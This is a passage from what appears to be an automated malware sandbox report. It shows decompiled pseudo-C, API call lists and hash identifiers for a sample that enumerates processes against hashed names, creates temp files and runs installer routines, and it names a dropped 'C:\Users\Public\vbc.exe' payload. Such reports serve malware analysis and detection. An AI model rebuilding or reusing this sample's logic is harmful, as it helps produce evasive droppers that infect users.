                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t153 = 4;
                                                                                                                                                                                                          				_t155 = E722F4225(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
                                                                                                                                                                                                          				if(_t155 == 0) {
                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                          			}













































































                                                                                                                                                                                                          0x722f4339
                                                                                                                                                                                                          0x722f433d
                                                                                                                                                                                                          0x722f4341
                                                                                                                                                                                                          0x722f4345
                                                                                                                                                                                                          0x722f4349
                                                                                                                                                                                                          0x722f434d
                                                                                                                                                                                                          0x722f4351
                                                                                                                                                                                                          0x722f4355
                                                                                                                                                                                                          0x722f4359
                                                                                                                                                                                                          0x722f435d
                                                                                                                                                                                                          0x722f4361
                                                                                                                                                                                                          0x722f4365
                                                                                                                                                                                                          0x722f436e
                                                                                                                                                                                                          0x722f437e
                                                                                                                                                                                                          0x722f438e
                                                                                                                                                                                                          0x722f439e
                                                                                                                                                                                                          0x722f43ae
                                                                                                                                                                                                          0x722f43be
                                                                                                                                                                                                          0x722f43ce
                                                                                                                                                                                                          0x722f43de
                                                                                                                                                                                                          0x722f43ee
                                                                                                                                                                                                          0x722f43fe
                                                                                                                                                                                                          0x722f440e
                                                                                                                                                                                                          0x722f441e
                                                                                                                                                                                                          0x722f4421
                                                                                                                                                                                                          0x722f4428
                                                                                                                                                                                                          0x722f442f
                                                                                                                                                                                                          0x722f4436
                                                                                                                                                                                                          0x722f443f
                                                                                                                                                                                                          0x722f4447
                                                                                                                                                                                                          0x722f444c
                                                                                                                                                                                                          0x722f444e
                                                                                                                                                                                                          0x722f4488
                                                                                                                                                                                                          0x722f448d
                                                                                                                                                                                                          0x722f4490
                                                                                                                                                                                                          0x722f449e
                                                                                                                                                                                                          0x722f44b6
                                                                                                                                                                                                          0x722f44b9
                                                                                                                                                                                                          0x722f44c0
                                                                                                                                                                                                          0x722f44cc
                                                                                                                                                                                                          0x722f44cf
                                                                                                                                                                                                          0x722f44d2
                                                                                                                                                                                                          0x722f44d6
                                                                                                                                                                                                          0x722f44e9
                                                                                                                                                                                                          0x722f44ec
                                                                                                                                                                                                          0x722f44ef
                                                                                                                                                                                                          0x722f44f3
                                                                                                                                                                                                          0x722f4509
                                                                                                                                                                                                          0x722f450c
                                                                                                                                                                                                          0x722f450e
                                                                                                                                                                                                          0x722f4514
                                                                                                                                                                                                          0x722f451b
                                                                                                                                                                                                          0x722f4523
                                                                                                                                                                                                          0x722f4528
                                                                                                                                                                                                          0x722f452a
                                                                                                                                                                                                          0x722f4531
                                                                                                                                                                                                          0x722f453d
                                                                                                                                                                                                          0x722f454b
                                                                                                                                                                                                          0x722f4575
                                                                                                                                                                                                          0x722f4578
                                                                                                                                                                                                          0x722f457a
                                                                                                                                                                                                          0x722f457e
                                                                                                                                                                                                          0x722f457e
                                                                                                                                                                                                          0x722f457a
                                                                                                                                                                                                          0x722f4583
                                                                                                                                                                                                          0x722f4583
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f450e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f44f3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f44d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f44c0
                                                                                                                                                                                                          0x722f4452
                                                                                                                                                                                                          0x722f445a
                                                                                                                                                                                                          0x722f445f
                                                                                                                                                                                                          0x722f4461
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f4465
                                                                                                                                                                                                          0x722f446c
                                                                                                                                                                                                          0x722f4471
                                                                                                                                                                                                          0x722f4473
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f4477
                                                                                                                                                                                                          0x722f447f
                                                                                                                                                                                                          0x722f4486
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 722F4225: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 722F426A
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 722F44B6
                                                                                                                                                                                                            • Part of subcall function 722F4225: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 722F428E
                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 722F44E9
                                                                                                                                                                                                            • Part of subcall function 722F4225: Process32NextW.KERNEL32(000000FF,0000022C), ref: 722F42B9
                                                                                                                                                                                                          • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 722F4509
                                                                                                                                                                                                          • ExitProcess.KERNELBASE(00000000), ref: 722F4583
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFileProcess32$AllocExitFirstNextProcessReadSnapshotToolhelp32Virtual
                                                                                                                                                                                                          • String ID: 73d617289d8945c299b1db53e6f35d05
                                                                                                                                                                                                          • API String ID: 1567874941-3630458439
                                                                                                                                                                                                          • Opcode ID: 1ce232aee319d8676acfab2c485de6f04bfdb48fbf44c22f5e161f8e2b8913af
                                                                                                                                                                                                          • Instruction ID: 4ccc116b33998a6850569abc872e0b4ce8aaa148c81d190d08f864e0b05156d1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce232aee319d8676acfab2c485de6f04bfdb48fbf44c22f5e161f8e2b8913af
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35912670D04389EEEF129BE8CC09BEDFEB9AF14305F10406AE650BA2D5C7B54A55CB25
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                                                                                                                          				char _t11;
                                                                                                                                                                                                          				signed int _t12;
                                                                                                                                                                                                          				int _t15;
                                                                                                                                                                                                          				signed int _t17;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				CHAR* _t21;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t21 = _a4;
                                                                                                                                                                                                          				_t20 = 0x64;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t11 =  *0x40a3ec; // 0x61736e
                                                                                                                                                                                                          					_t20 = _t20 - 1;
                                                                                                                                                                                                          					_a4 = _t11;
                                                                                                                                                                                                          					_t12 = GetTickCount();
                                                                                                                                                                                                          					_t17 = 0x1a;
                                                                                                                                                                                                          					_a6 = _a6 + _t12 % _t17;
                                                                                                                                                                                                          					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                                                                                                                                                                          					if(_t15 != 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t20 != 0) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *_t21 =  *_t21 & 0x00000000;
                                                                                                                                                                                                          					return _t15;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t21;
                                                                                                                                                                                                          			}










APIs
• GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,00403484,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405E29
• GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405E43
Strings
Memory Dump Source
• Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
Similarity
• API ID: CountFileNameTempTick
• String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-1498418707
• Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
• Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
• Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
• Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E72E316DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                                          				void _v36;
                                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                                          				struct HINSTANCE__* _t37;
                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                          				signed int _t63;
                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t76 = __esi;
                                                                                                                                                                                                          				_t68 = __edi;
                                                                                                                                                                                                          				_t67 = __edx;
                                                                                                                                                                                                          				 *0x72e3405c = _a8;
                                                                                                                                                                                                          				 *0x72e34060 = _a16;
                                                                                                                                                                                                          				 *0x72e34064 = _a12;
                                                                                                                                                                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x72e34038, E72E31556);
                                                                                                                                                                                                          				_push(1); // executed
                                                                                                                                                                                                          				_t37 = E72E31A98(); // executed
                                                                                                                                                                                                          				_t54 = _t37;
                                                                                                                                                                                                          				if(_t54 == 0) {
                                                                                                                                                                                                          					L28:
                                                                                                                                                                                                          					return _t37;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                                                                                                          						E72E322AF(_t54);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					E72E322F1(_t67, _t54);
                                                                                                                                                                                                          					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                                                                                                          					if(_t57 == 0xffffffff) {
                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                          						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
                                                                                                                                                                                                          							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                                                                                                                                          								_t37 = E72E324D8(_t54);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_push(_t76);
                                                                                                                                                                                                          								_push(_t68);
                                                                                                                                                                                                          								_t61 = 8;
                                                                                                                                                                                                          								_t13 = _t54 + 0x818; // 0x818
                                                                                                                                                                                                          								memcpy( &_v36, _t13, _t61 << 2);
                                                                                                                                                                                                          								_t42 = E72E3156B(_t54,  &_v88);
                                                                                                                                                                                                          								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
                                                                                                                                                                                                          								_t18 = _t54 + 0x818; // 0x818
                                                                                                                                                                                                          								_t72 = _t18;
                                                                                                                                                                                                          								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
                                                                                                                                                                                                          								 *_t72 = 3;
                                                                                                                                                                                                          								E72E324D8(_t54);
                                                                                                                                                                                                          								_t63 = 8;
                                                                                                                                                                                                          								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							E72E324D8(_t54);
                                                                                                                                                                                                          							_t37 = GlobalFree(E72E31266(E72E31559(_t54)));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                                                                                                          							_t37 = E72E3249E(_t54);
                                                                                                                                                                                                          							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                                                                                                                                          								_t37 =  *(_t54 + 0x808);
                                                                                                                                                                                                          								if(_t37 != 0) {
                                                                                                                                                                                                          									_t37 = FreeLibrary(_t37);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
                                                                                                                                                                                                          								_t37 = E72E314E2( *0x72e34058);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
                                                                                                                                                                                                          							goto L28;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							return GlobalFree(_t54);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t48 =  *_t54;
                                                                                                                                                                                                          					if(_t48 == 0) {
                                                                                                                                                                                                          						if(_t57 != 1) {
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E72E32CC3(_t54);
                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                          						_t54 = _t48;
                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t49 = _t48 - 1;
                                                                                                                                                                                                          					if(_t49 == 0) {
                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                          						_t48 = E72E32A38(_t57, _t54); // executed
                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t50 = _t49 - 1;
                                                                                                                                                                                                          					if(_t50 == 0) {
                                                                                                                                                                                                          						E72E326B2(_t54);
                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t50 != 1) {
                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 72E31A98: GlobalFree.KERNEL32(?), ref: 72E31D09
                                                                                                                                                                                                            • Part of subcall function 72E31A98: GlobalFree.KERNEL32(?), ref: 72E31D0E
                                                                                                                                                                                                            • Part of subcall function 72E31A98: GlobalFree.KERNEL32(?), ref: 72E31D13
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E31786
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 72E31809
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E3182E
                                                                                                                                                                                                            • Part of subcall function 72E322AF: GlobalAlloc.KERNEL32(00000040,?), ref: 72E322E0
                                                                                                                                                                                                            • Part of subcall function 72E326B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72E31757,00000000), ref: 72E32782
                                                                                                                                                                                                            • Part of subcall function 72E3156B: wsprintfA.USER32 ref: 72E31599
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3962662361-3916222277
                                                                                                                                                                                                          • Opcode ID: eb57688421203f75bb5ac725ae1a95dc25ec1022b82c243420d072c4bfb2377c
                                                                                                                                                                                                          • Instruction ID: 925cabda9b176cae10d6345814888c1ee023eee2b32c23b923873970724ab8a5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb57688421203f75bb5ac725ae1a95dc25ec1022b82c243420d072c4bfb2377c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2415E765012089BCB039B6CDD84B9D3BACBF0531BF98E46DE9479E087DB748485CBA1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E004032BF(intOrPtr _a4) {
                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                          				signed int _t12;
                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                          				long _t16;
                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                          				intOrPtr _t35;
                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                          				intOrPtr _t48;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t33 =  *0x429464 -  *0x40b898 + _a4;
                                                                                                                                                                                                          				 *0x42f450 = GetTickCount() + 0x1f4;
                                                                                                                                                                                                          				if(_t33 <= 0) {
                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                          					E00402E52(1);
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E0040343E( *0x429474);
                                                                                                                                                                                                          				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
                                                                                                                                                                                                          				 *0x429470 = _t33;
                                                                                                                                                                                                          				 *0x429460 = 0;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t30 = 0x4000;
                                                                                                                                                                                                          					_t11 =  *0x429468 -  *0x429474;
                                                                                                                                                                                                          					if(_t11 <= 0x4000) {
                                                                                                                                                                                                          						_t30 = _t11;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t12 = E00403428(0x41d460, _t30);
                                                                                                                                                                                                          					if(_t12 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x429474 =  *0x429474 + _t30;
                                                                                                                                                                                                          					 *0x40b8a0 = 0x41d460;
                                                                                                                                                                                                          					 *0x40b8a4 = _t30;
                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                          					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
                                                                                                                                                                                                          						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
                                                                                                                                                                                                          						E00402E52(0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x40b8a8 = 0x415460;
                                                                                                                                                                                                          					 *0x40b8ac = 0x8000;
                                                                                                                                                                                                          					if(E0040677B(0x40b8a0) < 0) {
                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t35 =  *0x40b8a8; // 0x415f10
                                                                                                                                                                                                          					_t36 = _t35 - 0x415460;
                                                                                                                                                                                                          					if(_t36 == 0) {
                                                                                                                                                                                                          						__eflags =  *0x40b8a4; // 0x0
                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                          						_t16 =  *0x429464;
                                                                                                                                                                                                          						if(_t16 -  *0x40b898 + _a4 > 0) {
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						SetFilePointer( *0x40a01c, _t16, 0, 0);
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
                                                                                                                                                                                                          					if(_t18 == 0) {
                                                                                                                                                                                                          						_push(0xfffffffe);
                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                          						_pop(_t15);
                                                                                                                                                                                                          						return _t15;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x40b898 =  *0x40b898 + _t36;
                                                                                                                                                                                                          					_t48 =  *0x40b8a4; // 0x0
                                                                                                                                                                                                          					if(_t48 != 0) {
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                          					_push(0xfffffffd);
                                                                                                                                                                                                          					goto L21;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t12 | 0xffffffff;
                                                                                                                                                                                                          			}













                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32(00000008,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004032D3
                                                                                                                                                                                                            • Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer$CountTick
                                                                                                                                                                                                          • String ID: `TA
                                                                                                                                                                                                          • API String ID: 1092082344-1754987364
                                                                                                                                                                                                          • Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                                                                                                                                          • Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                                          			E0040209D(void* __ebx, void* __eflags) {
                                                                                                                                                                                                          				struct HINSTANCE__* _t18;
                                                                                                                                                                                                          				struct HINSTANCE__* _t26;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				struct HINSTANCE__* _t30;
                                                                                                                                                                                                          				CHAR* _t32;
                                                                                                                                                                                                          				intOrPtr* _t33;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t27 = __ebx;
                                                                                                                                                                                                          				asm("sbb eax, 0x42f518");
                                                                                                                                                                                                          				 *(_t34 - 4) = 1;
                                                                                                                                                                                                          				if(__eflags < 0) {
                                                                                                                                                                                                          					_push(0xffffffe7);
                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                          					E00401423();
                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                          					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t32 = E00402BCE(0xfffffff0);
                                                                                                                                                                                                          				 *(_t34 + 8) = E00402BCE(1);
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                                                                                                                                          					_t30 = _t18;
                                                                                                                                                                                                          					if(_t30 == _t27) {
                                                                                                                                                                                                          						_push(0xfffffff6);
                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                          					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                                                                                                                                          					if(_t33 == _t27) {
                                                                                                                                                                                                          						E00405374(0xfffffff7,  *(_t34 + 8));
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						 *(_t34 - 4) = _t27;
                                                                                                                                                                                                          						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                                                                                                                                          							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                                                                                                                                          							if( *_t33() != 0) {
                                                                                                                                                                                                          								 *(_t34 - 4) = 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
                                                                                                                                                                                                          						FreeLibrary(_t30);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t26 = GetModuleHandleA(_t32); // executed
                                                                                                                                                                                                          				_t30 = _t26;
                                                                                                                                                                                                          				if(_t30 != __ebx) {
                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L3;
                                                                                                                                                                                                          			}











                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                                                                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020E8
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
